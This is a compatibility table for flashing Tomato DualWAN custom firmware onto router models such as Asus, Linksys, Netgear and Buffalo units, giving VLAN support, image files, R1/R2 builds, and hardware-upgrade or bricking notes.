    Asus RT-N16            |                              | Yes          | Does not support | Flash the R2 build                                          |
    Asus RT-N12            |                              | Yes          | Does not support | Flash the R2 build                                          | Flash must be upgraded to 8M
    Asus WL-520GU          |                              | Yes          | Tomato-ND.trx    | Flash the R1 build                                          | The USB 2.0 driver works normally
    Asus WL-500GP          | V1, V2                       | Yes          | Tomato-ND.trx    | Flash the R1 build                                          |
    Asus WL-550GE          |                              | Yes          | Tomato-ND.trx    | Flash the R1 build                                          |
    Buffalo WHR-G125       |                              | Yes          | Tomato-ND.trx    | Flash the R1 build                                          |
    Buffalo WHR-G54S       |                              | Yes          | Tomato-ND.trx    | Flash the R1 build                                          |
    Belkin 8230-4          |                              | No           | Tomato-ND.trx    | Flash the R1 build                                          | The built-in mini card must be replaced with a 4306 or 4318
    Belkin 8230-4          | Flashed with the WRTSL54GS CFE | No         | WRTSL54GS.bin    | Flash the R1 build                                          | The built-in mini card must be replaced with a 4306 or 4318; 128M of memory is supported
    Linksys WRH54G         |                              | Yes          | Tomato-ND.trx    | Flash the R1 build                                          | Flash must be upgraded to 4M or more and memory to 16M or more
    Linksys WRT54G2        |                              | Yes          | Tomato-ND.trx    | Flash the R1 build                                          | Flash must be upgraded to 4M or more and memory to 16M or more; thanks to leeanky for the information
    Netcore NW 618         |                              | Yes          | Tomato-ND.trx    | Flash the R1 build                                          | Must be flashed from the web interface of the original firmware, otherwise it may brick; flashing via TFTP does not have this problem. Thanks to "flying bird" for the information
    Netgear WGR614         | V6                           | Yes          | Tomato-ND.trx    | Flash the R1 build, but it bricks easily for unknown reasons | Flash must be upgraded to 4M or more and memory to 16M or more; thanks to leeanky for the information
    Linksys WRT160N        | V3                           | Unknown      | Does not support | Flash the R2 build                                          | Flash must be upgraded to 8M or more
    Linksys WRT300N        | V1                           | Unknown      | Tomato-ND.trx    | Flash the R1 build                                          |
    Linksys WRT310N        | V1                           | Unknown      | Tomato-ND.trx    | Flash the R1 build                                          |
    Linksys WRT320N        |                              | Unknown      | Does not support | Flash the R2 build                                          |
    Linksys WRT610N        | V2                           | Unknown      | Does not support | Flash the R2 build                                          | Does not support dual-band
    Netgear WNR3500L       |                              | Yes          | Does not support | Flash the R2 build                                          |
    Netgear WNR3500 v2 / U |                              | Unknown      | Does not support | Flash the R2 build                                          | Flash must be upgraded to 8M or more
    Netgear WNR2000 v2     |                              | Unknown      | Does not support | Flash the R2 build                                          | Flash must be upgraded to 8M or more

    For devices not in the list: as long as the original Tomato can be flashed, Tomato DualWAN can be flashed as well. If VLAN is not supported, WAN2 simply cannot be connected to a wired network, but it can still be used as a wireless client to access someone else's wireless network. K24 firmware: the Tomato DualWAN 1.23 and 1.25 series (development of both has stopped); K26 firmware, using the Linux 2.6 kernel: the Tomato DualWAN 1.28 series.

    Routers such as TP-Link, Mercury, D-Link, Tenda and Alpha cannot be flashed!!!